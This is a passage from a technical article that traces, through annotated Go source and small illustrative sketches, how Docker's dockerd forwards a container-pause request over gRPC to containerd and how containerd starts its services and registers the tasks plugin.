<span class="k">func</span> <span class="n">buildRouters</span><span class="p">(</span><span class="n">opts</span> <span class="n">routerOptions</span><span class="p">)</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Router</span> <span class="p">{</span>
    <span class="n">routers</span> <span class="o">:=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Router</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">container</span><span class="o">.</span><span class="n">NewRouter</span><span class="p">(</span><span class="n">opts</span><span class="o">.</span><span class="n">daemon</span><span class="p">),</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="n">NewRouter</span><span class="p">(</span><span class="n">b</span> <span class="n">Backend</span><span class="p">)</span> <span class="n">router</span><span class="o">.</span><span class="n">Router</span> <span class="p">{</span>
    <span class="n">r</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">containerRouter</span><span class="p">{</span>
        <span class="n">backend</span><span class="o">:</span> <span class="n">b</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">r</span><span class="o">.</span><span class="n">initRoutes</span><span class="p">()</span> <span class="c">// [7]</span>
    <span class="k">return</span> <span class="n">r</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/pause"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersPause</span><span class="p">),</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="22-send-request-to-containerd">2.2. Send Request to containerd</h3>

<p>Some endpoints simply return status or metadata, but others handle more complex tasks and need to forward requests to <code class="language-plaintext highlighter-rouge">containerd</code>. Here, we’ll use <strong>pausing a container</strong> as an example (since it’s more straightforward).</p>

<p>Pausing a container is handled by <code class="language-plaintext highlighter-rouge">postContainersPause()</code> [1], which internally calls <code class="language-plaintext highlighter-rouge">t.Task.Pause()</code> [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/server/router/container/container.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">initRoutes</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">c</span><span class="o">.</span><span class="n">routes</span> <span class="o">=</span> <span class="p">[]</span><span class="n">router</span><span class="o">.</span><span class="n">Route</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">router</span><span class="o">.</span><span class="n">NewPostRoute</span><span class="p">(</span><span class="s">"/containers/{name:.*}/pause"</span><span class="p">,</span> <span class="n">c</span><span class="o">.</span><span class="n">postContainersPause</span><span class="p">),</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// daemon/server/router/container/container_routes.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersPause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerPause</span><span class="p">(</span><span class="n">vars</span><span class="p">[</span><span class="s">"name"</span><span class="p">]);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>

    <span class="n">w</span><span class="o">.</span><span class="n">WriteHeader</span><span class="p">(</span><span class="n">http</span><span class="o">.</span><span class="n">StatusNoContent</span><span class="p">)</span> <span class="c">// response to docker-cli</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// daemon/pause.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">ContainerPause</span><span class="p">(</span><span class="n">name</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">GetContainer</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerPause</span><span class="p">(</span><span class="n">ctr</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">containerPause</span><span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">tsk</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">GetRunningTask</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="n">tsk</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">Background</span><span class="p">())</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// daemon/internal/libcontainerd/remote/client.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">task</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">t</span><span class="o">.</span><span class="n">Task</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [2]</span>
<span class="p">}</span>
</code></pre></div></div>

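<p>You may not find a definition of <code class="language-plaintext highlighter-rouge">.Pause()</code> in the daemon code itself, because <code class="language-plaintext highlighter-rouge">task</code> embeds the <code class="language-plaintext highlighter-rouge">Task</code> interface [3] provided by <code class="language-plaintext highlighter-rouge">containerd</code>, so the call at [2] is forwarded to the implementation that <code class="language-plaintext highlighter-rouge">containerd</code> supplies.</p>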

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// daemon/internal/libcontainerd/remote/client.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">containerd</span> <span class="s">"github.com/containerd/containerd/v2/client"</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">type</span> <span class="n">task</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">containerd</span><span class="o">.</span><span class="n">Task</span> <span class="c">// [3]</span>
    <span class="n">ctr</span> <span class="o">*</span><span class="n">container</span>
<span class="p">}</span>
</code></pre></div></div>
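
<p>If the embedding pattern is unfamiliar, here is a minimal standalone sketch of it. The names <code class="language-plaintext highlighter-rouge">Pauser</code> and <code class="language-plaintext highlighter-rouge">remotePauser</code> are made up for illustration and do not exist in Moby or containerd. The only point is that a struct embedding an interface forwards the call to whatever implementation was stored in it.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "fmt"

// Pauser stands in for the containerd Task interface (hypothetical, one method only).
type Pauser interface {
    Pause() error
}

// remotePauser stands in for an implementation that lives in another module.
type remotePauser struct{ id string }

func (r remotePauser) Pause() error {
    fmt.Println("pausing", r.id)
    return nil
}

// task embeds the interface, so the implementation is reachable as t.Pauser.
type task struct {
    Pauser
}

// Pause wraps the embedded method, mirroring the shape of the wrapper at [2].
func (t task) Pause() error {
    return t.Pauser.Pause()
}

func main() {
    t := task{Pauser: remotePauser{id: "demo"}}
    if err := t.Pause(); err != nil {
        fmt.Println("error:", err)
    }
}
</code></pre></div></div>

<p>Searching the wrapper’s own package for the body of <code class="language-plaintext highlighter-rouge">Pause()</code> only finds the forwarding call, which is why we have to continue the search in <code class="language-plaintext highlighter-rouge">containerd</code>.</p>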

<p>By grepping through the source code of <a href="https://github.com/containerd/containerd"><code class="language-plaintext highlighter-rouge">containerd</code></a>, we can see that the <code class="language-plaintext highlighter-rouge">Pause()</code> method of <code class="language-plaintext highlighter-rouge">Task</code> is implemented in <code class="language-plaintext highlighter-rouge">client/task.go</code>. It wraps the container ID in a <code class="language-plaintext highlighter-rouge">PauseTaskRequest</code> [4], which is a <strong>Protobuf message</strong>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// client/task.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">task</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">t</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">TaskService</span><span class="p">()</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tasks</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">{</span>  <span class="c">// [4]</span>
        <span class="n">ContainerID</span><span class="o">:</span> <span class="n">t</span><span class="o">.</span><span class="n">id</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// api/services/tasks/v1/tasks.pb.go</span>
<span class="k">type</span> <span class="n">PauseTaskRequest</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">state</span>         <span class="n">protoimpl</span><span class="o">.</span><span class="n">MessageState</span>
    <span class="n">sizeCache</span>     <span class="n">protoimpl</span><span class="o">.</span><span class="n">SizeCache</span>
    <span class="n">unknownFields</span> <span class="n">protoimpl</span><span class="o">.</span><span class="n">UnknownFields</span>

    <span class="n">ContainerID</span> <span class="kt">string</span> <span class="s">`protobuf:"bytes,1,opt,name=container_id,json=containerId,proto3" json:"container_id,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Note that there is more than one <code class="language-plaintext highlighter-rouge">tasks</code> package, and it can be confusing to tell which one is being used. You can identify the correct one by <strong>checking the import path</strong> [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// client/client.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/containerd/containerd/api/services/tasks/v1"</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">TaskService</span><span class="p">()</span> <span class="n">tasks</span><span class="o">.</span><span class="n">TasksClient</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">tasks</span><span class="o">.</span><span class="n">NewTasksClient</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">conn</span><span class="p">)</span> <span class="c">// v1</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Following the call chain, the generated client calls <code class="language-plaintext highlighter-rouge">Invoke()</code> on the client connection, which eventually calls <code class="language-plaintext highlighter-rouge">SendMsg()</code> [6] with the request as its argument, sending the Protobuf payload to <code class="language-plaintext highlighter-rouge">containerd</code> via <code class="language-plaintext highlighter-rouge">containerd.sock</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">tasksClient</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">PauseTaskRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.tasks.v1.Tasks/Pause"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/google.golang.org/grpc/call.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">)</span> <span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="n">combine</span><span class="p">(</span><span class="n">cc</span><span class="o">.</span><span class="n">dopts</span><span class="o">.</span><span class="n">callOptions</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">cc</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">unaryStreamDesc</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">StreamDesc</span><span class="p">{</span><span class="n">ServerStreams</span><span class="o">:</span> <span class="no">false</span><span class="p">,</span> <span class="n">ClientStreams</span><span class="o">:</span> <span class="no">false</span><span class="p">}</span>
<span class="k">func</span> <span class="n">invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">cs</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newClientStream</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">unaryStreamDesc</span><span class="p">,</span> <span class="n">cc</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cs</span><span class="o">.</span><span class="n">SendMsg</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [6]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">cs</span><span class="o">.</span><span class="n">RecvMsg</span><span class="p">(</span><span class="n">reply</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
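
<p>To make the “Protobuf payload” a bit more concrete, the sketch below hand-encodes a message whose only field is string field number 1 (as in the struct tag of <code class="language-plaintext highlighter-rouge">PauseTaskRequest</code>) and adds the 5-byte gRPC length prefix. The helper names are hypothetical, <code class="language-plaintext highlighter-rouge">"abc"</code> is a placeholder rather than a real container ID, and the sketch assumes an uncompressed message with a non-empty ID and ignores the HTTP/2 layer entirely. Real code should rely on the generated types and the gRPC library.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import (
    "encoding/binary"
    "fmt"
)

// encodePauseRequest hand-encodes a message whose only field is
// string field number 1, matching the struct tag "bytes,1,opt".
// Assumption: containerID is non-empty (proto3 omits empty strings).
func encodePauseRequest(containerID string) []byte {
    // Tag byte 0x0a means field number 1 with wire type 2 (length-delimited).
    msg := []byte{0x0a}
    msg = binary.AppendUvarint(msg, uint64(len(containerID)))
    return append(msg, containerID...)
}

// frame adds the gRPC length prefix: a 1-byte compression flag (0 here),
// then a 4-byte big-endian message length, then the message itself.
func frame(msg []byte) []byte {
    out := make([]byte, 5, 5+len(msg))
    binary.BigEndian.PutUint32(out[1:], uint32(len(msg)))
    return append(out, msg...)
}

func main() {
    msg := encodePauseRequest("abc") // placeholder ID
    fmt.Printf("% x\n", msg)        // 0a 03 61 62 63
    fmt.Printf("% x\n", frame(msg)) // 00 00 00 00 05 0a 03 61 62 63
}
</code></pre></div></div>

<p>So a pause request is tiny on the wire: a tag byte, a length, the container ID, and a 5-byte prefix in front of it.</p>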

<h2 id="3-containerd">3. containerd</h2>

<p>The containerd GitHub repo provides a <a href="https://github.com/containerd/containerd/blob/main/docs/historical/design/architecture.png">clear diagram</a> of its architecture:</p>

<p><img src="/assets/image-20260526000000000.png" alt="image-20260526000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>For example, according to the diagram, pausing a container is a container runtime operation, and the runtime is managed by <code class="language-plaintext highlighter-rouge">Task</code>. This matches the previous section, where we traced the call flow in <code class="language-plaintext highlighter-rouge">dockerd</code> and confirmed that pausing a container goes through <code class="language-plaintext highlighter-rouge">containerd.Task</code>.</p>

<p>Next, we’ll trace the code flow to understand how <code class="language-plaintext highlighter-rouge">containerd</code> receives and handles requests from <code class="language-plaintext highlighter-rouge">dockerd</code>.</p>

<h3 id="31-receive-requests-from-dockerd">3.1. Receive Requests from dockerd</h3>

<p>When the <code class="language-plaintext highlighter-rouge">containerd</code> daemon starts, the <code class="language-plaintext highlighter-rouge">command</code> and <code class="language-plaintext highlighter-rouge">builtins</code> packages are imported [1, 2], and <code class="language-plaintext highlighter-rouge">App()</code> sets up two services: TTRPC (Tiny RPC) [3] and gRPC [4]. A debug service is also set up if a debug address is configured [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/main.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/containerd/containerd/v2/cmd/containerd/command"</span> <span class="c">// [1]</span>
    <span class="n">_</span> <span class="s">"github.com/containerd/containerd/v2/cmd/containerd/builtins"</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">app</span> <span class="o">:=</span> <span class="n">command</span><span class="o">.</span><span class="n">App</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">app</span><span class="o">.</span><span class="n">Run</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// cmd/containerd/command/main.go</span>
<span class="k">func</span> <span class="n">App</span><span class="p">()</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">App</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="k">var</span> <span class="n">l</span> <span class="n">net</span><span class="o">.</span><span class="n">Listener</span>
        <span class="k">if</span> <span class="n">isLocalAddress</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">GID</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">net</span><span class="o">.</span><span class="n">Listen</span><span class="p">(</span><span class="s">"tcp"</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeDebug</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>

    <span class="n">tl</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">GID</span><span class="p">)</span>
    <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">tl</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeTTRPC</span><span class="p">)</span> <span class="c">// [3]</span>
    
    <span class="c">// [...]</span>
    
    <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">GID</span><span class="p">)</span>
    <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeGRPC</span><span class="p">)</span> <span class="c">// [4]</span>
    
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">builtins</code> package is a wrapper that imports the built-in packages, and one of them is <code class="language-plaintext highlighter-rouge">tasks</code> [6]. Because the package is imported, the <code class="language-plaintext highlighter-rouge">init()</code> function of the <code class="language-plaintext highlighter-rouge">tasks</code> package runs during program startup, and it calls <code class="language-plaintext highlighter-rouge">Register()</code> [7] to add the plugin to the registry.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/builtins/builtins.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">_</span> <span class="s">"github.com/containerd/containerd/v2/plugins/services/tasks"</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span> <span class="c">// [7]</span>
        <span class="n">Type</span><span class="o">:</span> <span class="n">plugins</span><span class="o">.</span><span class="n">GRPCPlugin</span><span class="p">,</span>
        <span class="n">ID</span><span class="o">:</span>   <span class="s">"tasks"</span><span class="p">,</span>
        <span class="n">Requires</span><span class="o">:</span> <span class="p">[]</span><span class="n">plugin</span><span class="o">.</span><span class="n">Type</span><span class="p">{</span>
            <span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">i</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">GetByID</span><span class="p">(</span><span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span> <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">service</span><span class="p">{</span><span class="n">local</span><span class="o">:</span> <span class="n">i</span><span class="o">.</span><span class="p">(</span><span class="n">api</span><span class="o">.</span><span class="n">TasksClient</span><span class="p">)},</span> <span class="no">nil</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>
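
<p>The self-registration idea can be reduced to a few lines. The following is a rough sketch with hypothetical names (<code class="language-plaintext highlighter-rouge">registration</code>, <code class="language-plaintext highlighter-rouge">register</code>, <code class="language-plaintext highlighter-rouge">registered</code>). It is not the containerd plugin API, only the same shape: <code class="language-plaintext highlighter-rouge">init()</code> records an entry before <code class="language-plaintext highlighter-rouge">main()</code> runs, and the entry is initialized later.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main

import "fmt"

// registration is a hypothetical, cut-down stand-in for plugin.Registration.
type registration struct {
    ID     string
    InitFn func() (any, error)
}

// registered plays the role of the global plugin registry.
var registered []registration

func register(r registration) {
    registered = append(registered, r)
}

// init runs before main, just as the init function of a package runs
// when a blank import pulls that package into the binary.
func init() {
    register(registration{
        ID:     "tasks",
        InitFn: func() (any, error) { return "tasks service", nil },
    })
}

func main() {
    // Later, the server walks the registry and initializes each entry.
    for _, r := range registered {
        svc, err := r.InitFn()
        if err != nil {
            fmt.Println("init failed:", r.ID, err)
            continue
        }
        fmt.Println(r.ID, "=", svc)
    }
}
</code></pre></div></div>

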